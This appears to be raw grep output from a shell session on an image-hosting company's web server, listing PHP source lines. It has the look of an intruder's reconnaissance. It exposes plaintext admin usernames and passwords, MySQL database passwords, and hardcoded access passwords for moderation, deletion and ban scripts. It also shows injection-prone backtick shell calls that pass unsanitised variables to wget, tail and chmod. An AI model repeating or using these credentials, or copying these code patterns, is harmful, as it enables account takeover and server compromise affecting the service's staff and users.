/home/image/www/write_imports2.php:$yfrog_array = explode("\n",trim(`cat /ho
me/image/partners.php | grep '@y' | awk -F'"' '{print \$2}'`));
/home/image/www/write_imports2.php: `mkdir -p /disk2/reports/$service/$day`;
/home/image/www/write_imports2.php: `chmod -R 777 /disk2/reports/$service/$d
ay`;
/home/image/www/write_imports2.php:`/bin/touch -r /bin/true $file`;
/home/image/www/write_imports_dev.php: `mkdir -p /disk2/reports/$service/$da
y`;
/home/image/www/write_imports_dev.php: `chmod -R 777 /disk2/reports/$service
/$day`;
/home/image/www/write_imports_dev.php: `mkdir -p /disk2/reports/y
frog_v2/$day`;
/home/image/www/write_imports_dev.php: `chmod -R 777 /disk2/repor
ts/yfrog_v2/$day`;
/home/image/www/write_imports_dev.php:`/bin/touch -r /bin/true $file`;
/home/image/www/yfrog_v2-sla.php:$last = explode(",",trim(`tail -1 $rowfile[
$csv]`)); //get a comma separated list of data from the last row in the repo
rt
/home/image/www/yfrog_v2-sla.php:$newheader = str_replace(" ",",",trim(`cat
$header[$csv] | awk -F"," '{print $1','$awk}'`));
/home/image/www/yfrog_v2-sla.php:$rows = explode("\n",str_replace(" ",",",tr
im(`tac $rowfile[$csv] | awk -F"," '{print $1','$awk}'`)));
# grep '`' /home/image/www/*/*.php
/home/image/www/db_api/feedapi.php: `us
er_id` = %d,
/home/image/www/db_api/feedapi.php: `st
atus_id` = %d,
/home/image/www/db_api/feedapi.php: `co
ordinates` = '%s',
/home/image/www/db_api/feedapi.php: `fa
vorited` = '%s',
/home/image/www/db_api/feedapi.php: `tr
uncated` = '%s',
/home/image/www/db_api/feedapi.php: `en
tities-urls` = '%s',
/home/image/www/db_api/feedapi.php: `en
tities-hashtags` = '%s',
/home/image/www/db_api/feedapi.php: `en
tities-user_mentions` ='%s',
/home/image/www/db_api/feedapi.php: `te
xt` ='%s',
/home/image/www/db_api/feedapi.php: `co
ntributors` ='%s',
/home/image/www/db_api/feedapi.php: `an
notations` ='%s',
/home/image/www/db_api/feedapi.php: `ge
o` ='%s',
/home/image/www/db_api/feedapi.php: `in
_reply_to_user_id` =%d,
/home/image/www/db_api/feedapi.php: `pl
ace-name` = '%s',
/home/image/www/db_api/feedapi.php: `pl
ace-country_code` ='%s',
/home/image/www/db_api/feedapi.php: `pl
ace-country` ='%s',
/home/image/www/db_api/feedapi.php: `pl
ace-attributes` ='%s',
/home/image/www/db_api/feedapi.php: `pl
ace-url` = '%s',
/home/image/www/db_api/feedapi.php: `pl
ace-id` = %d,
/home/image/www/db_api/feedapi.php: `pl
ace-bounding_box-coordinates` ='%s',
/home/image/www/db_api/feedapi.php: `pl
ace-bounding_box-type` ='%s',
/home/image/www/db_api/feedapi.php: `pl
ace-full_name` ='%s',
/home/image/www/db_api/feedapi.php: `pl
ace-type` ='%s',
/home/image/www/db_api/feedapi.php: `in
_reply_to_screen_name` ='%s',
/home/image/www/db_api/feedapi.php: `so
urce` ='%s',
/home/image/www/db_api/feedapi.php: `in
_reply_to_status_id` =%d;",
/home/image/www/db_api/groupapi.php: 'title' => "`title` not spec
ified",
/home/image/www/db_api/groupapi.php: 'string_id' => "`string_id` not
specified",
/home/image/www/db_api/groupapi.php: 'cookie' => "`cookie` not spe
cified"
/home/image/www/db_api/groupapi.php: 'title' => "`title` not spec
ified",
/home/image/www/db_api/groupapi.php: 'string_id' => "`string_id` not
specified",
/home/image/www/db_api/groupapi.php: 'account_id' => "`account_id`
not specified"
/home/image/www/db_api/groupapi.php: 'group_id' => "`group_id` n
ot specified",
/home/image/www/db_api/groupapi.php: 'cookie' => "`cookie` not sp
ecified",
/home/image/www/db_api/groupapi.php: SELECT COUNT(*) FROM `group_item
` AS gi
/home/image/www/db_api/groupapi.php: INNER JOIN `group` AS g ON (gi.g
roup_id=g.id)
/home/image/www/db_api/groupapi.php: FROM `group` AS g WHERE string_id='%s
' AND account_id=%d
/home/image/www/db_api/groupapi.php: (SELECT COUNT(*) FROM `group_item` A
S gi WHERE gi.group_id=g.id) AS count
/home/image/www/db_api/groupapi.php: FROM `group` AS g
/home/image/www/db_api/groupapi.php: LEFT JOIN `group_item` AS gi ON (gi.g
roup_id=g.id)
/home/image/www/db_api/groupapi.php: FROM `group_item` AS gi
/home/image/www/db_api/groupapi.php: INNER JOIN `group` AS g ON
(g.id = gi.group_id)
/home/image/www/db_api/groupapi.php: SELECT gi.id AS group_item_id, gi
.* as total FROM `group_item` AS gi
/home/image/www/db_api/groupapi.php: INNER JOIN `group` AS g
ON (g.id = gi.group_id)
/home/image/www/db_api/groupapi.php: (SELECT COUNT(*) FROM `group_item` AS
gi WHERE gi.group_id=g.id) AS count
/home/image/www/db_api/groupapi.php: FROM `group` AS g
/home/image/www/db_api/groupapi.php: LEFT JOIN `group_item` AS gi ON (gi.gr
oup_id=g.id)
/home/image/www/db_api/groupapi.php: WHERE g.`group_type_id`=%d AND g.`acco
unt_id`=%d
/home/image/www/db_api/metaapi.php:CREATE TABLE `search_phrase` (
/home/image/www/db_api/metaapi.php: `k` varchar(255) default NULL,
/home/image/www/db_api/metaapi.php: `v` text,
/home/image/www/db_api/metaapi.php: KEY `k_idx` (`k`)
/home/image/www/db_api/metaapi.php: $sql = "DROP TABLE IF EXISTS `search_ph
rase_import`";
/home/image/www/db_api/metaapi.php: $sql = "CREATE TABLE `search_phrase_imp
ort` (`k` varchar(255) default NULL,`v` text,KEY `k_idx` (`k`)) ENGINE=MyISA
M DEFAULT CHARSET=latin1";
/home/image/www/db_api/relatedapi.php: $sql = 'CREATE TABLE `related_clus
ters_temp` (
/home/image/www/db_api/relatedapi.php: `id` int(10) unsigned NOT NULL ,
/home/image/www/db_api/relatedapi.php: `last_updated` int(10) unsigned de
fault NULL,
/home/image/www/db_api/relatedapi.php: `size` int(11) NOT NULL,
/home/image/www/db_api/relatedapi.php: PRIMARY KEY (`id`)
/home/image/www/db_api/relatedapi.php: $sql = 'CREATE TABLE `related_imag
es_temp` (
/home/image/www/db_api/relatedapi.php: `id` int(10) unsigned NOT NULL ,
/home/image/www/db_api/relatedapi.php: `server` smallint(5) unsigned NOT
NULL,
/home/image/www/db_api/relatedapi.php: `filename` varchar(60) character s
et latin1 collate latin1_bin default NULL,
/home/image/www/db_api/relatedapi.php: `cluster_id` int(10) unsigned NOT
NULL,
/home/image/www/db_api/relatedapi.php: `position` int(10) unsigned NOT NU
LL,
/home/image/www/db_api/relatedapi.php: PRIMARY KEY (`id`),
/home/image/www/db_api/relatedapi.php: UNIQUE KEY `cluster_pos` (`cluster
_id`,`position`),
/home/image/www/db_api/relatedapi.php: UNIQUE KEY `file_server_uniq` (`se
rver`,`filename`,`cluster_id`)
/home/image/www/db_api/trackingcookieapi.php: * CREATE TABLE `tracking_
cookie` (
/home/image/www/db_api/trackingcookieapi.php: * `uuid_cookie` char(
32) default NULL,
/home/image/www/db_api/trackingcookieapi.php: * `v` text,
/home/image/www/db_api/trackingcookieapi.php: * KEY `uuid_cookie_id
x` (`uuid_cookie`)
/home/image/www/db_api/trackingcookieapi.php: $sql = "DROP TABLE IF EXISTS
`search_phrase_import`";
/home/image/www/db_api/trackingcookieapi.php: $sql = "CREATE TABLE `search_
phrase_import` (`k` varchar(255) default NULL,`v` text,KEY `k_idx` (`k`)) EN
GINE=MyISAM DEFAULT CHARSET=latin1";
/home/image/www/en/actionitems.php: $allString = trim(`cat /home/imag
e/www/auths.php | grep admin | grep pass | cut -d"'" -f2 | xargs`);
/home/image/www/en/actionitems.php: $fileString = trim(`for i in \`/bin/ls /
home/image/www/actionitems/ | cut -d"." -f2 | sort | uniq | tac\`; do /bin/l
s -tr /home/image/www/actionitems/ | grep \$i | tac $extra_grep ; done | xar
gs`);
/home/image/www/en/actionitems.php: $data = trim(`/bin/ls /home/image/www/ac
tionitems/ | cut -d"." -f2,3 | sort | uniq | xargs`);
/home/image/www/en/billing.php: `wget -O /tmp/$name.png $wget`;
/home/image/www/en/billing.php: `cp /tmp/$name.png /home/image/www/en/$name.
png`;
/home/image/www/en/evilporn.php:$data = ` tail -$amount /home/image/www/loli
ta | sort | uniq`;
/home/image/www/en/galleryadmin.php:$data = ` tail -$amount /home/image/www/
bad.log | sort | uniq`;
/home/image/www/en/genWire.php:$data = explode(" ",trim(`/bin/ls -t /home/im
age/www/wires/ | xargs`));
/home/image/www/en/items.php:// $fileString = trim(`/bin/ls -t /home/image/w
ww/actionitems/ | xargs`);
/home/image/www/en/items.php: $fileString = trim(`/bin/ls /home/image/www/ac
tionitems/ | awk -F"." '{print \$2"."\$3"."\$1}' | sort | awk -F"." '{print
\$3"."\$1"."\$2}' | tac | xargs`);
/home/image/www/en/items.php: $allString = trim(`cat /home/image/www/auths.p
hp | grep admin | grep pass | cut -d"'" -f2 |xargs`);
/home/image/www/en/items.php: $data = trim(`/bin/ls /home/image/www/actionit
ems/ | cut -d"." -f2,3 | sort | uniq | xargs`);
/home/image/www/en/mentions.php: $messages = trim(`head -$tail /tmp/menti
ons`);
/home/image/www/en/subscribe.php:$dd = `date +%s`;
/home/image/www/homepage/thumbloader.php: `$WGET_EXE --user-agent="ImageS
hack Image Fetcher 1.0" -O$TMP_DIR/$rnd_name $url`;
/home/image/www/mobilevideo/checkelectra.php:if(`ps --no-headers $epid 2>&1
>/dev/null`=='')
/home/image/www/tpl/index.tpl.php:# $serv = trim(`/sbin/ifconfig | grep "Bca
st" | head -1 | cut -d":" -f2 | cut -d" " -f1`);
/home/image/www/tpl/index.tpl.php: $serv = trim(`/sbin/ifconfig | gre
p "Bcast" | head -1 | cut -d":" -f2 | cut -d" " -f1`);
/home/image/www/tpl/index.tpl.php: $serv = trim(`/sbin/ifconfig | gre
p "Bcast" | head -1 | cut -d":" -f2 | cut -d" " -f1`);
/home/image/www/video/delete.php:`/bin/chmod 000 $path`;
/home/image/www/video/delete.php:`/bin/chmod 000 $thumbpath`;
/home/image/www/video/delete.php:`/bin/chmod 000 $frmpath`;
/home/image/www/video/delete.php:`/bin/chmod 000 $atompath`;
/home/image/www/video/delete.php: `/bin/chmod 000 $path`;
/home/image/www/video/delete.php: `/bin/chmod 000 $thumbpath`;
/home/image/www/video/delete.php: `/bin/chmod 000 $frmpath`;
# grep '`' /home/image/www/en/*.php
/home/image/www/en/actionitems.php: $allString = trim(`cat /home/imag
e/www/auths.php | grep admin | grep pass | cut -d"'" -f2 | xargs`);
/home/image/www/en/actionitems.php: $fileString = trim(`for i in \`/bin/ls /
home/image/www/actionitems/ | cut -d"." -f2 | sort | uniq | tac\`; do /bin/l
s -tr /home/image/www/actionitems/ | grep \$i | tac $extra_grep ; done | xar
gs`);
/home/image/www/en/actionitems.php: $data = trim(`/bin/ls /home/image/www/ac
tionitems/ | cut -d"." -f2,3 | sort | uniq | xargs`);
/home/image/www/en/billing.php: `wget -O /tmp/$name.png $wget`;
/home/image/www/en/billing.php: `cp /tmp/$name.png /home/image/www/en/$name.
png`;
/home/image/www/en/evilporn.php:$data = ` tail -$amount /home/image/www/loli
ta | sort | uniq`;
/home/image/www/en/galleryadmin.php:$data = ` tail -$amount /home/image/www/
bad.log | sort | uniq`;
/home/image/www/en/genWire.php:$data = explode(" ",trim(`/bin/ls -t /home/im
age/www/wires/ | xargs`));
/home/image/www/en/items.php:// $fileString = trim(`/bin/ls -t /home/image/w
ww/actionitems/ | xargs`);
/home/image/www/en/items.php: $fileString = trim(`/bin/ls /home/image/www/ac
tionitems/ | awk -F"." '{print \$2"."\$3"."\$1}' | sort | awk -F"." '{print
\$3"."\$1"."\$2}' | tac | xargs`);
/home/image/www/en/items.php: $allString = trim(`cat /home/image/www/auths.p
hp | grep admin | grep pass | cut -d"'" -f2 |xargs`);
/home/image/www/en/items.php: $data = trim(`/bin/ls /home/image/www/actionit
ems/ | cut -d"." -f2,3 | sort | uniq | xargs`);
/home/image/www/en/mentions.php: $messages = trim(`head -$tail /tmp/menti
ons`);
/home/image/www/en/subscribe.php:$dd = `date +%s`;
# grep file_put_contents /home/image/www/*/*.php
/home/image/www/advertiser/index.php:file_put_contents("/tmp/ad.log",$final_
url."\n",FILE_APPEND);
/home/image/www/db_api/replication_check.php: if (!file_put_contents(
$df_cache . '.tmp', serialize($df))) {
/home/image/www/en/actionitems.php: file_put_contents("/home/image/www/actio
nitems/$username.$weeknow.$year","\n".$items, FILE_APPEND);
/home/image/www/en/actionitems.php: file_put_contents("/home/image/ww
w/actionitems/$username.$weeknow.$year",$checkString, FILE_APPEND);
/home/image/www/en/advertiser.php:file_put_contents("/tmp/ad.log",$final_url
."\n",FILE_APPEND);
/home/image/www/en/error.php:file_put_contents($error_code[$rcode],$date." "
.$url."\n", FILE_APPEND);
/home/image/www/en/genWire.php: file_put_contents("/home/image/www/en/genWir
e.txt", $log, FILE_APPEND);
/home/image/www/en/genWire.php:file_put_contents("/home/image/www/wires/$fil
eDate-$time.htm",$html);
/home/image/www/en/items.php: file_put_contents("/home/image/www/actionitems
/$username.$weeknow.$year","\n".$items, FILE_APPEND);
/home/image/www/en/items.php: file_put_contents("/home/image/www/acti
onitems/$username.$weeknow.$year",$checkString, FILE_APPEND);
/home/image/www/en/register_domain.php: file_put_contents("/var/log/reg_dom
ains","$domains_string\n", FILE_APPEND);
/home/image/www/en/register_domain.php: file_put_contents("/var/log/reg_dom
ains_ids","$name,$email,$text\n", FILE_APPEND);
/home/image/www/en/register_domain_dev.php: file_put_contents("/var/log/reg
_domains","$domains_string\n", FILE_APPEND);
/home/image/www/en/register_domain_dev.php: file_put_contents("/var/log/reg
_domains_ids","$name,$email,$text\n", FILE_APPEND);
/home/image/www/hire/document.php:file_put_contents("/tmp/hires.log",$log,FI
LE_APPEND);
/home/image/www/homepage/scaled.php: if (file_put_content
s($scaled_file_name . '.tmp', $stdout)) {
/home/image/www/illegal_content/ncmec_report.php: file_put_contents(T
HE_LATEST, time());
/home/image/www/pillspam/index.php: file_put_contents("/home/image/pillspam.
txt",$element_1."\n",FILE_APPEND);
# grep file_put_contents /home/image/www/*.php
/home/image/www/403.php: file_put_contents("/tmp/pillspam.serial",$se
rial);
/home/image/www/alert_writer.php: file_put_contents($location,$alert_content
);
/home/image/www/banpanel.php: file_put_contents("/tmp/unbanned.log", $file."
\n", FILE_APPEND);
/home/image/www/c_mod.php:file_put_contents("/home/image/www/check_mod.txt",
"$current_time $file $timestamp $service $info\n", FILE_APPEND);
/home/image/www/c_mod.php: file_put_contents("/home/image/www/check_mod_mobi
le.txt","$current_time $file $timestamp $service $info $country\n", FILE_APP
END);
/home/image/www/check.php:file_put_contents("/home/image/www/check_mod.txt",
"$current_time $timestamp $service $info\n", FILE_APPEND);
/home/image/www/check_mod.php:file_put_contents("/home/image/www/check_mod.t
xt","$current_time $file $timestamp $service $info\n", FILE_APPEND);
/home/image/www/check_mod.php: file_put_contents("/home/image/www/check_mod_
mobile.txt","$current_time $file $timestamp $service $info $country\n", FILE
_APPEND);
/home/image/www/chmod_me.php: file_put_contents("/tmp/chmod_me.backup",$t
ime." ".$password." ".$string."\n",FILE_APPEND);
/home/image/www/chmod_me.php: file_put_contents("/tmp/chmod_me_restore.ba
ckup",$time." ".$password." ".$string."\n",FILE_APPEND);
/home/image/www/chmod_me.php://file_put_contents($tempfile,"$output\n");
/home/image/www/chmod_me.php:file_put_contents($tempfile2,"$output\n");
/home/image/www/chmod_me2.php: file_put_contents("/tmp/chmod_me.backup",$
time." ".$password." ".$string."\n",FILE_APPEND);
/home/image/www/chmod_me2.php: file_put_contents("/tmp/chmod_me_restore.b
ackup",$time." ".$password." ".$string."\n",FILE_APPEND);
/home/image/www/chmod_me2.php://file_put_contents($tempfile,"$output\n");
/home/image/www/chmod_me2.php:file_put_contents($tempfile2,"$output\n");
/home/image/www/chmod_me3.php:file_put_contents("/tmp/chmod_me.backup",$time
." ".$password." ".$string."\n",FILE_APPEND);
/home/image/www/chmod_me3.php:file_put_contents("$tempfile","$output\n");
/home/image/www/chmod_me_dev.php: file_put_contents("/tmp/chmod_me.backup
",$time." ".$password." ".$string."\n",FILE_APPEND);
/home/image/www/chmod_me_dev.php: file_put_contents("/tmp/chmod_me_restor
e.backup",$time." ".$password." ".$string."\n",FILE_APPEND);
/home/image/www/chmod_me_dev.php:file_put_contents($tempfile,"$output\n");
/home/image/www/chmod_pull.php:file_put_contents("/home/image/www/chmod_dir/
purge_list","$list\n", FILE_APPEND);
/home/image/www/chmod_pull.php:file_put_contents("/home/image/www/chmod_dir/
verify_list","$list\n", FILE_APPEND);
/home/image/www/contact_new.php: file_put_contents("/home/image/www/en/t
obedeleted.file", $listDelete, FILE_APPEND);
/home/image/www/contact_new.php: file_put_contents("/home/image/www/en/torre
ntdeletes.file", $torDelete, FILE_APPEND);
/home/image/www/convo.php:file_put_contents("/home/image/www/convo.txt",$mes
sage);
/home/image/www/deletefailed.php: file_put_contents("/home/image/www/delete
fail.txt",$send_number);
/home/image/www/deletefailed.php: file_put_contents("/home/image/www/delete
fail.txt","");
/home/image/www/functions.php: if (@file_put_contents($hits_file . '.tmp'
, ($this_hits+1))) {
/home/image/www/grand.php: file_put_contents("/tmp/values.temp",$temp);
/home/image/www/grand2.php: file_put_contents("/tmp/values.temp",$temp);
/home/image/www/insert_to_queue.php:file_put_contents("/home/image/www/check
_mod.txt","$current_time $file $timestamp $service $info\n", FILE_APPEND);
/home/image/www/insert_to_queue.php: file_put_contents("/home/image/www/chec
k_mod_mobile.txt","$current_time $file $timestamp $service $info $country\n"
, FILE_APPEND);
/home/image/www/modpanel.php: file_put_contents($fullpath."/".$s_service."/
".$local_auth[username].".porn",$porn,FILE_APPEND);
/home/image/www/modpanel.php: file_put_contents($fullpath."/".$s_service."/
totalporn.porn","$porn",FILE_APPEND);
/home/image/www/modpanel.php: file_put_contents($fullpath."/hbase_insert/po
rn","$porn",FILE_APPEND);
/home/image/www/modpanel.php: file_put_contents($fullpath."/".$s_service."/
".$local_auth[username].".illegal",$illegal,FILE_APPEND);
/home/image/www/modpanel.php: file_put_contents($fullpath."/".$s_service."/
totalporn.porn","$illegal",FILE_APPEND);
/home/image/www/modpanel.php: file_put_contents($fullpath."/hbase_insert/po
rn",$illegal,FILE_APPEND);
/home/image/www/modpanel.php: file_put_contents("$fullpath/$
s_service/flagged/illegal.content", $illegal_list, FILE_APPEND);
/home/image/www/modpanel1.php: file_put_contents($fullpath."/".$s_service."
/".$local_auth[username].".porn",$porn,FILE_APPEND);
/home/image/www/modpanel1.php: file_put_contents($fullpath."/".$s_service."
/totalporn.porn","$porn",FILE_APPEND);
/home/image/www/modpanel1.php: file_put_contents($fullpath."/".$s_service."
/".$local_auth[username].".illegal",$illegal,FILE_APPEND);
/home/image/www/modpanel1.php: file_put_contents($fullpath."/".$s_service."
/totalporn.porn","$illegal",FILE_APPEND);
/home/image/www/modpanel1.php: file_put_contents("$fullpath/
$s_service/flagged/illegal.content", $illegal_list, FILE_APPEND);
/home/image/www/modpanel2.php: file_put_contents($fullpath."/".$s_service."
/".$local_auth[username].".porn",$porn,FILE_APPEND);
/home/image/www/modpanel2.php: file_put_contents($fullpath."/".$s_service."
/totalporn.porn","$porn",FILE_APPEND);
/home/image/www/modpanel2.php: file_put_contents($fullpath."/hbase_insert/p
orn","$porn",FILE_APPEND);
/home/image/www/modpanel2.php: file_put_contents($fullpath."/".$s_service."
/".$local_auth[username].".illegal",$illegal,FILE_APPEND);
/home/image/www/modpanel2.php: file_put_contents($fullpath."/".$s_service."
/totalporn.porn","$illegal",FILE_APPEND);
/home/image/www/modpanel2.php: file_put_contents($fullpath."/hbase_insert/p
orn",$illegal,FILE_APPEND);
/home/image/www/modpanel2.php: file_put_contents("$fullpath/
$s_service/flagged/illegal.content", $illegal_list, FILE_APPEND);
/home/image/www/modpanel_v2.php: file_put_contents($fullpath."/".$s_service
."/".$local_auth[username].".porn",$porn,FILE_APPEND);
/home/image/www/modpanel_v2.php: file_put_contents($fullpath."/".$s_service
."/totalporn.porn","$porn",FILE_APPEND);
/home/image/www/modpanel_v2.php: file_put_contents($fullpath."/hbase_insert
/porn","$porn",FILE_APPEND);
/home/image/www/modpanel_v2.php: file_put_contents($fullpath."/".$s_service
."/".$local_auth[username].".illegal",$illegal,FILE_APPEND);
/home/image/www/modpanel_v2.php: file_put_contents($fullpath."/".$s_service
."/totalporn.porn","$illegal",FILE_APPEND);
/home/image/www/modpanel_v2.php: file_put_contents($fullpath."/hbase_insert
/porn",$illegal,FILE_APPEND);
/home/image/www/modpanel_v2.php: file_put_contents("$fullpat
h/$s_service/flagged/illegal.content", $illegal_list, FILE_APPEND);
/home/image/www/modpanel_v3.php: file_put_contents($fullpath."/".$s_service
."/".$local_auth[username].".porn",$porn,FILE_APPEND);
/home/image/www/modpanel_v3.php: file_put_contents($fullpath."/".$s_service
."/totalporn.porn","$porn",FILE_APPEND);
/home/image/www/modpanel_v3.php: file_put_contents($fullpath."/hbase_insert
/porn","$porn",FILE_APPEND);
/home/image/www/modpanel_v3.php: file_put_contents($fullpath."/".$s_service
."/".$local_auth[username].".illegal",$illegal,FILE_APPEND);
/home/image/www/modpanel_v3.php: file_put_contents($fullpath."/".$s_service
."/totalporn.porn","$illegal",FILE_APPEND);
/home/image/www/modpanel_v3.php: file_put_contents($fullpath."/hbase_insert
/porn",$illegal,FILE_APPEND);
/home/image/www/modpanel_v3.php: file_put_contents("$fullpat
h/$s_service/flagged/illegal.content", $illegal_list, FILE_APPEND);
/home/image/www/popular.php:file_put_contents("/home/image/www/popular.txt",
$timestamp."\n",FILE_APPEND);
/home/image/www/routing_collector.php:file_put_contents("/home/image/www/rou
ting.txt",$routing_table);
/home/image/www/search_list.php: file_put_contents($this->file, $data);
/home/image/www/setxmlproperties.php: file_put_contents($file, (int)
param('count'));
/home/image/www/uploads.php:file_put_contents("/tmp/values",$write,FILE_APPE
ND);
/home/image/www/uploads.php:file_put_contents("/home/image/www/uploadchange.
txt",$final);
/home/image/www/vpn_onsite_collector.php: file_put_contents("/home/im
age/www/onsite.txt",$_POST[onsite_number]);
/home/image/www/write_banlogs.php: file_put_contents("/tmp/banwrite.log", $
data, FILE_APPEND);
/home/image/www/write_import2.php:file_put_contents($file, $imploded."\n", F
ILE_APPEND);
/home/image/www/write_import2.php: file_put_contents($hdfs,$imploded."\n"
, FILE_APPEND);
/home/image/www/write_imports.php:file_put_contents($file, $imploded."\n", F
ILE_APPEND);
/home/image/www/write_imports.php: file_put_contents($hdfs,$imploded."\n"
, FILE_APPEND);
/home/image/www/write_imports2.php:file_put_contents($file,$imploded."\n", F
ILE_APPEND);
/home/image/www/write_imports2.php:file_put_contents($hdfs,$imploded."\n", F
ILE_APPEND);
/home/image/www/write_imports_dev.php: file_put_contents($file_yfrog2
,$imploded."\n", FILE_APPEND);
/home/image/www/write_imports_dev.php: file_put_contents($file,$implo
ded."\n", FILE_APPEND);
/home/image/www/write_imports_dev.php: file_put_contents($file,$imploded.
"\n", FILE_APPEND);
/home/image/www/write_imports_dev.php: file_put_contents($hdfs,$imploded.
"\n", FILE_APPEND);
# grep 'kotik' /home/image/www/*.php
/home/image/www/banpanel.php: $url = "http://$loc.imageshack.us/unbanwrite.p
hp?file=$file&pass=kotik";
/home/image/www/chmod_cli.php:chmod_list($string,"kotik123");
/home/image/www/chmod_me.php:if($password != "kotik123"){ exit; }
/home/image/www/chmod_me2.php:if($password != "kotik123"){ exit; }
/home/image/www/chmod_me3.php:if($password != "kotik123"){ exit; }
/home/image/www/chmod_me_dev.php:if($password != "kotik123"){ exit; }
/home/image/www/contact.php: chmod_list($listDelete,"kotik123");
/home/image/www/cwho.php:if($pass != "kotik"){ exit; }
/home/image/www/dbclient.php: chmod_list(implode("\n", $items), 'koti
k123');
/home/image/www/modpanel.php: chmod_list($porn,"kotik123");
/home/image/www/modpanel.php: chmod_list($illegal,"kotik123");
/home/image/www/modpanel1.php: chmod_list($porn,"kotik123");
/home/image/www/modpanel1.php: chmod_list($illegal,"kotik123");
/home/image/www/modpanel2.php: chmod_list($porn,"kotik123");
/home/image/www/modpanel2.php: chmod_list($illegal,"kotik123");
/home/image/www/modpanel_v2.php: chmod_list($porn,"kotik123");
/home/image/www/modpanel_v2.php: chmod_list($illegal,"kotik123");
/home/image/www/modpanel_v3.php: chmod_list($porn,"kotik123");
/home/image/www/modpanel_v3.php: chmod_list($illegal,"kotik123");
/home/image/www/testmail.php: 'password' => 'kotik123'
/home/image/www/unbanwrite.php:if($pass != "kotik" || !file_exists("/home/im
age/www/$file.ban")) { exit; }
# grep 'password' /home/image/www/*.php|wc
129 1301 14024
# grep 'password' /home/image/www/*.php|grep -v kotik|wc
124 1277 13696
# grep 'password' /home/image/www/*.php|grep -v kotik
/home/image/www/auth.php:$password = param('password');
/home/image/www/auth.php:if (empty($username) || empty($password))
/home/image/www/auth.php: report_error('bad_arguments', 'Please speci
fy username and password');
/home/image/www/auth.php:$info = login($username, $password);
/home/image/www/auth.php: report_error('authentication_failed', 'Inva
lid login or password specified');
/home/image/www/auths.php: $users['rjoseph'] = array('id' => '8', 'pa
ssword' => 'giafrl', 'locale' => 'usa', 'admin' => 1);
/home/image/www/auths.php: $users['alex'] = array('id' => '9', 'passw
ord' => 'trouch', 'locale' => 'usa', 'admin' => 1);
/home/image/www/auths.php: $users['jack'] = array('id' => '10', 'pass
word' => 'woezle', 'locale' => 'usa', 'admin' => 1);
/home/image/www/auths.php: $users['henry'] = array('id' => '11', 'pas
sword' => 'mthgurk', 'locale' => 'usa', 'admin' => 1);
/home/image/www/auths.php: $users['edwin'] = array('id' => '13', 'pas
sword' => 'CHY309aso', 'locale' => 'usa', 'admin' => 1);
/home/image/www/auths.php: $users['nick'] = array('id' => '14', 'pass
word' => 'lmittap44', 'locale' => 'usa', 'admin' => 1);
/home/image/www/auths.php: $users['avolkov'] = array('id' => '15', 'p
assword' => 'leeloo007', 'locale' => 'usa', 'admin' => 1);
/home/image/www/auths.php: $users['mikhail'] = array('id' => '16', 'p
assword' => 'voland', 'locale' => 'usa', 'admin' => 1);
/home/image/www/auths.php: $users['michelle'] = array('id' => '17', '
password' => 'Branded93', 'locale' => 'usa', 'admin' => 1);
/home/image/www/auths.php: $users['chrmaury'] = array('id' => '18', '
password' => 'Soccre55', 'locale' => 'usa', 'admin' => 1);
/home/image/www/auths.php: $users['mh4672'] = array('id' => '20', 'password'
=> 'jugvcdj', 'locale' => 'usa', 'admin' => 1);
/home/image/www/auths.php: $users['chris'] = array('id' => '21', 'password'
=> 'moyhcew', 'locale' => 'usa', 'admin' => 1);
/home/image/www/auths.php: $users['matt'] = array('id' => '22', 'password' =
> 'vdsulbj', 'locale' => 'usa', 'admin' => 1);
/home/image/www/auths.php: $users['theworldsurvivor'] = array('id' => '23',
'password' => 'pmnigvds', 'locale' => 'usa', 'admin' => 1);
/home/image/www/auths.php: $users['linuxsable'] = array('id' => '24', 'passw
ord' => 'qyvhjlkl', 'locale' => 'usa', 'admin' => 1);
/home/image/www/auths.php: $users['sfharkey'] = array('id' => '25', 'passwor
d' => 'cjkfwjo', 'locale' => 'usa', 'admin' => 1);
/home/image/www/auths.php: $users['dblack'] = array('id' => '26', 'password'
=> 'nohfbnk', 'locale' => 'usa', 'admin' => 1);
/home/image/www/auths.php: $users['sunkris'] = array('id' => '27', 'password
' => 'ljvdsrj', 'locale' => 'usa', 'admin' => 1);
/home/image/www/auths.php: $users['wes'] = array('id' => '28', 'password' =>
'nloyhbb', 'locale' => 'usa', 'admin' => 1);
/home/image/www/auths.php: $users['relentlesssteve'] = array('id' => '29', '
password' => 'm5btigh', 'locale' => 'usa', 'admin' => 1);
/home/image/www/auths.php: $users['halljam'] = array('id' => '30', 'password
' => 'mrtnfudy', 'locale' => 'usa', 'admin' => 1);
/home/image/www/auths.php: $users['alice'] = array('id' => '31', 'password'
=> 'n7nrkj', 'locale' => 'usa', 'admin' => 1);
/home/image/www/auths.php: $users['serge'] = array('id' => '32', 'password'
=> 'across37', 'locale' => 'usa', 'admin' => 1);
/home/image/www/auths.php: if (isset($users[$http_user]) && $users[$http_
user]['password'] == $http_pass) {
/home/image/www/chmod_me.php: file_put_contents("/tmp/chmod_me.backup",$t
ime." ".$password." ".$string."\n",FILE_APPEND);
/home/image/www/chmod_me.php: file_put_contents("/tmp/chmod_me_restore.ba
ckup",$time." ".$password." ".$string."\n",FILE_APPEND);
/home/image/www/chmod_me2.php: file_put_contents("/tmp/chmod_me.backup",$
time." ".$password." ".$string."\n",FILE_APPEND);
/home/image/www/chmod_me2.php: file_put_contents("/tmp/chmod_me_restore.b
ackup",$time." ".$password." ".$string."\n",FILE_APPEND);
/home/image/www/chmod_me3.php:file_put_contents("/tmp/chmod_me.backup",$time
." ".$password." ".$string."\n",FILE_APPEND);
/home/image/www/chmod_me_dev.php: file_put_contents("/tmp/chmod_me.backup
",$time." ".$password." ".$string."\n",FILE_APPEND);
/home/image/www/chmod_me_dev.php: file_put_contents("/tmp/chmod_me_restor
e.backup",$time." ".$password." ".$string."\n",FILE_APPEND);
/home/image/www/db_connect.php:$mysql_password = "mutaborius";
/home/image/www/db_connect.php: $mysql_password = "";
/home/image/www/db_connect.php:$bd = mysql_connect($mysql_hostname, $mysql_u
ser, $mysql_password);
/home/image/www/db_connect_stream.php:$mysql_password = "iabmeclttc";
/home/image/www/db_connect_stream.php:$bd = mysql_connect($mysql_hostname, $
mysql_user, $mysql_password);
/home/image/www/functions.php:function chmod_list($string,$password){
/home/image/www/functions.php: $data['password'] = $password;
/home/image/www/notify.php:$password = trim(stripslashes($_POST['password'])
);
/home/image/www/register_image.php: $a_password = pass_crypt(generate
_password());
/home/image/www/remove_torrent.php:if($password != "isicyk48"){ exit; }
/home/image/www/save_images.php: $a_password = null;
/home/image/www/save_images.php: $a_passw
ord));
